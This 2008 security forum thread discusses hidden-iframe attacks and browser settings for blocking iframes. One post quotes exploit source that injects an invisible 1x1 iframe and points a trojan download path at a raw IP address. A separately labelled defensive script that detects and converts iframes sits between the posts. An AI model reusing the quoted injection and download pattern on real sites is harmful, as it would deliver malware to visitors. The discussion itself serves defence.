Ongoing IFrame attack proving difficult to kill

Discussion in 'malware problems & news' started by ronjor, Mar 18, 2008.

Thread Status:
Not open for further replies.
  1. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    164,131
    Location:
    Texas
    Article
     
  2. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Nasty!
     
  3. Rilla927

    Rilla927 Registered Member

    Joined:
    May 12, 2005
    Posts:
    1,742
    I keep iframes disabled through IE. Just curious, would Online Armor detect such a thing?
     
  4. noway

    noway Registered Member

    Joined:
    Apr 24, 2005
    Posts:
    461
  5. steve161

    steve161 Registered Member

    Joined:
    Nov 22, 2006
    Posts:
    681
    Location:
    New York
    Interesting, I blocked iframes with Noscript and can still see the example in the link. Maybe I am misunderstanding the "forbid iframes" option.

    Edit: Or that is not an iframe, just an example.
     
  6. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    It's an iframe. See here.
     

    Attached Files:

  7. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    Hi Aigle

    How did you turn them off in Opera?

    Pete
     
  8. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    Hi Peter, I just tried it today.

    Tools > Preferences > Advanced > Content > Style Options > tick off Enable inline frames
     
  9. Rilla927

    Rilla927 Registered Member

    Joined:
    May 12, 2005
    Posts:
    1,742
    Thanks for posting the link. Even though I have Iframes disabled in IE for every zone I can still see the frame in your link. How else can this be disabled? What did they put the option there for if it's not going to work when disabled?

    @Aigle

    Where did you get the cool skin & toolbar for Opera?
     
    Last edited: Mar 20, 2008
  10. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Iframe exploits are nothing new, of course, and achieved notoriety at least as far back as 2004 with Banner Ads:

    http://www.secureworks.com/research/threats/iframeads/

    A careful reading of the current article shows that all that has changed is the method of delivering the iframe content onto the user's web page. The end results are the same: to deliver a payload.

    Interestingly, the current exploit seems to rely on social engineering:

    More devious are methods employing remote code execution. Sans.org documented one using the MPack tool:

    MPack Analysis
    http://isc.sans.org/diary.html?storyid=3015
    An example of searching for vulnerabilities when a user connects to such a page was the Postcards exploit. The source code included this:

    Code:
    document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');
    
     var Trojan_Path="http://210.0.219.41/cgi-bin/ie0601.cgi?exploit="; 
    
    
    The iframe cached another page with five exploits. If one was found, the trojan path above was executed to download exefile.exe. This was discussed a while back in the Anti-Executable forum to show how easily these types of remote code execution exploits are blocked with White List protection.

    [Image: iframe-ae1.gif]

    Currently, the discussions in the LUA and SRP threads would show similar protection.

    Not all Iframes are hostile. The CSMonitor news site uses them to load changing Spotlight stories:

    [Image: iframe-csm.gif]

    [Image: iframe-csm2.gif]

    Iframes are a useful function, and like many useful functions, they have been mis-used by malware writers.


    ----
    rich
     
    Last edited: Mar 20, 2008
  11. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
  12. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    See attached picture
     

    Attached Files:

  13. steve161

    steve161 Registered Member

    Joined:
    Nov 22, 2006
    Posts:
    681
    Location:
    New York
    Yes, that is what is ticked, the iframe in the example still appeared.

    Aigle: While I still prefer Firefox, Lix is the best skin.
     
  14. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    I think the difference is probably that the iframe in question is not invoking a script making requests on the browser to offset commands internally but it is simply pulling text out of a ".txt" file and as such it is a legitimate iframe and not considered hostile...

    Not all Iframes are filtered...
     
  15. steve161

    steve161 Registered Member

    Joined:
    Nov 22, 2006
    Posts:
    681
    Location:
    New York
    Hi Hermescomputers:

    So you are saying that NoScript does not block all Iframes, but only those that exhibit a specific behavior?
     
  16. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Essentially yes. Iframe by design is a good thing that provides a useful service; it is the hostile ones that are identified and filtered out.

    Someone with more "internal" knowledge of the mechanism behind the Noscript Iframe filter should answer this one... I'm not an accomplished coder so the discrimination algorithm isn't my forte...
     
    Last edited: Mar 20, 2008
  17. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    I'd guess that NoScript only blocks IFRAMEs which pull executable/interpretable code. If an IFRAME tries to pull plaintext content, it will do nothing. Just my educated guess.
     
  18. noway

    noway Registered Member

    Joined:
    Apr 24, 2005
    Posts:
    461
    I use IE6 + Proxomitron and the filter "iFrame/iLayer to Link" converts them to links. I changed this filter so that the URL Match is ^$LST(IFrameAllow) where the IFrameAllow List is a list of all the sites that I allow I-Frames for.
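
The allow-list approach in the post above, applied to the 1x1 iframe pattern from the Postcards snippet quoted earlier in the thread, as an added example that is not part of any post and is not Proxomitron's own filter syntax. The sample page, `PAGE_URL`, the `*.example` hosts and all function names are assumptions made for illustration.

```javascript
// Added example, not code from the thread. SAMPLE is a constructed page;
// the *.example hosts and PAGE_URL are placeholders.
const PAGE_URL = 'http://postcards.example/index.html';
const SAMPLE = `<p>news</p>
<iframe src="http://stories.example/spotlight.html" width="300" height="250"></iframe>
<script>document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');</script>
<iframe style="display:none" src="http://ads.example/x.html"></iframe>`;

const esc = (s) => s.replace(/[&<>"']/g, (c) => `&#${c.charCodeAt(0)};`);

// Read name="v", name='v' and bare name=v pairs from one opening tag.
function parseAttrs(tag) {
  const attrs = {};
  const re = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  for (const m of tag.matchAll(re)) attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  return attrs;
}

// A frame the visitor cannot see: 0-2 px wide or high, or hidden by inline style.
function isHidden(a) {
  const tiny = (v) => v !== undefined && parseInt(v, 10) <= 2;
  const style = (a.style || '').replace(/\s+/g, '').toLowerCase();
  return tiny(a.width) || tiny(a.height) ||
    style.includes('display:none') || style.includes('visibility:hidden');
}

// Text-level filter, as a filtering proxy would apply it: it also sees iframe
// markup written out by document.writeln(), as in the Postcards snippet.
function iframesToLinks(html, pageUrl, allowHosts) {
  const findings = [];
  const out = html.replace(/<iframe\b[^>]*>(?:[\s\S]*?<\/iframe\s*>)?/gi, (whole) => {
    const a = parseAttrs(whole.match(/^<iframe\b[^>]*>/i)[0]);
    let url = null;
    try { if (a.src) url = new URL(a.src, pageUrl); } catch { /* unparsable src */ }
    const host = url ? url.hostname : '';
    const allowed = allowHosts.includes(host);
    findings.push({ src: a.src || '', host, hidden: isHidden(a), allowed });
    if (allowed) return whole;                      // allow-listed: leave intact
    if (!url || !/^https?:$/.test(url.protocol)) return '[iframe removed]';
    return `<a href="${esc(url.href)}">[iframe: ${esc(url.href)}]</a>`;
  });
  return { out, findings };
}

const result = iframesToLinks(SAMPLE, PAGE_URL, ['stories.example']);
console.log(result.findings);
console.log(result.out);
```

The `hidden` flag is reported separately from the allow-list decision, so a visible frame from an unlisted host is still converted to a link while a hidden one can additionally be logged for review.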
     
  19. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan

    Are not these two totally different things? :D
     
  20. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    So NoScript is wise, not so dumb in case of iframes?
     
  21. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    I guess so.
     
  22. steve161

    steve161 Registered Member

    Joined:
    Nov 22, 2006
    Posts:
    681
    Location:
    New York
    No, I meant I use both. Best looking-advantage Opera w/ Lix. Oh no, a which is the best looking browser thread: CLOSED Now, back to iframes. :D
     
  23. CogitoErgoSum

    CogitoErgoSum Registered Member

    Joined:
    Aug 22, 2005
    Posts:
    641
    Location:
    Cerritos, California
  24. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Doing some more thinking about Iframe filters within Noscript... I think that the dynamic filter only applies to sites on the allow list, as sites without permitted scripts would have all Iframes blocked and not only those meeting non-hostile criteria...

    Just an educated guess but I think it would be the more logical application to the reasons why some Iframes pass and others are blocked...
     
  25. bigc73542

    bigc73542 Retired Moderator

    Joined:
    Sep 21, 2003
    Posts:
    23,934
    Location:
    SW. Oklahoma

    One problem in unchecking inline frames in Opera is that Gmail no longer opens. The ability to use colored text on several of my other forums is disabled without inline frames. It has been more of a pain with it turned off than the risk of leaving it enabled. At least for me.
     
    Last edited: Mar 21, 2008